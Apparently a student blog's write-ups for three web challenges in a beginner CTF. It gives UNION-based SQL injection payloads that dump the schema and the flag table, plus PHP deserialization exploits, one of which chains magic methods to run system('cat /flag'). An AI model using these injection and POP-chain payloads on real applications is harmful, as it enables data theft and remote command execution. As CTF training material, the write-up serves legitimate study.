新生赛web题解
本文最后更新于:2024年4月6日 下午
ikun注入 常规的数字型注入
union select database();union select table_name from information_schema.tables where table_schema= database();union select column_name from information_schema.columns where table_name= 'F14g' ;union select yourflag from F14g;
ez_serialize <?php class AHUctf { public $start = True; public function __destruct ( ) { global $flag ; if ($this ->start === True){ echo "flag在这里" .$flag ; } } }$ahuctf =new AHUctf ();echo serialize ($ahuctf );
ezpop 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 <?php error_reporting (0 );class func { public $func ; public $content ; public function __construct ($func ,$content ) { $this ->func=$func ; $this ->content=$content ; } public function __tostring ( ) { call_user_func ($this ->func,$this ->content); } }class output { public $output ; public $hahaha ; public function __construct ($output ,$hahaha ) { $this ->output=$output ; $this ->hahaha=$hahaha ; } public function myecho ( ) { echo $output ; } public function __invoke ( ) { $this ->output; } public function __wakeup ( ) { if (preg_match ('/system/i' ,$this ->output)){ die ("hacker" ); }else { $this ->hahaha->haha; } } }class tofunc { public $name ; public function __construct ($name ) { $this ->name=$name ; } public function __get ($key ) { $function =$this ->name; return $function (); } }$func1 = new func ("system" ,"cat /flag" );$output1 =new output ($func1 ,"" );$tofunc1 =new tofunc ($output1 );$output2 =new output ("" ,$tofunc1 );echo serialize ($output2 );